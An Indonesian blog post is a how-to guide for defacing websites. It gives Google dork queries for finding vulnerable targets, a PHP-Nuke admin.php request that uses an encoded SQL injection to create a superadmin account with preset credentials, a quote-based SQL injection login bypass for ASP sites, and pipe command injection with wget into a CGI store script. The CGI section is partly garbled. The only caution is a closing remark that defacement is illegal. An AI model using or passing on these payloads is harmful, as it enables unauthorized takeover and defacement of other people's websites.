Cara dan langkah DEFACE

Diposting oleh Unknown di 20.56 Label:


Apa itu deface? 
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja server lambat dan lama-kelamaan server akan crash dan down.
Itulah deface.
Nah kalo udah ngerti apa itu defase, sekarang giliran cara melakukandeface....

Berikut cara langkah langkah untuk melakukan deface

Deface situs php nuke
Pake mbah www.google.com
ketik kalimat berikut :
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php

2. www.target.com/nuke/admin.php => (index.php yg diatas tadi dirubah menjadi admin.php)
 
3. Masukkan bug ini di belakang situs tadi :
?op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox
misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=smartbekantan&add_name=
God&add_pwd=render07&add_email=
bekantan@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox


Jika tidak bisa berarti situs tersebut sudah dipath oleh admin nya.
Tapi jika berhasil, maka di url/browsing akan muncul
www.target.com/nuke/admin.php?op=mod_author
4. Login, dan masukan id & password tadi.
Masih ingat kan ?
id=smartbekantan => liat yg diatas tadi
password=render07 => liat yg diatas tadi

Nah kita sekarang sudah masuk ke “Administration Menu” situs tersebut. Kamu sudah bisa utak atik dan menguasai website tersebut. 


deface asp dgn sql injection
1. buka browsing/url www.google.co.id
2. ketik site:go.id login.asp
    misal nya kita dapat target www.situstarget.com/login.asp
3. username dan pass ketik ‘or”=’
4. buka satu persatu file yg ada disana
5. cari file yg bisa kita ubah/deface
6. buka browsing/url baru lalu ketikkan target tadi misalnya www.situsarget.com
7. kalo hasil nya belum ada, klik tab refresh disamping url tersebut.

deface cgi 
https://bronte.netpresence.com.au/~wolfsecu/coartcds/Web_store/
web_store.cgi?page=coart_frontpage.html <<< page="coart_frontpage.html|pwd|" page="coart_frontpage.html|wget" nya =""> https://bronte.netpresence.com.au/~wolfsecu/arai.html
…/home/sites/site52/users/wolfsecu/web/coartcds/Web_store <<< target =""> allinurl*.cgi * page:.*html+site:.us atau http://www.google.co.id/search?q=allinurl*.cgi%3Fpage%3D*.html+site:.com&hl=id&lr=&start=10&sa=N
target harus file .html diujungnya jika ingin ditambah |pwd|


Nih contoh yang berhasil saya deface (.....)

Itulah deface dan kamu sudah jadi defacer dan sudah jadi tersangka serta buronan sebagai defacer....


Pesan saya... HATI-HATI dalam bertindak. Karena deface termasuk perbuatan melanggar hukum.

0 komentar:

Posting Komentar

Langganan: Posting Komentar (Atom)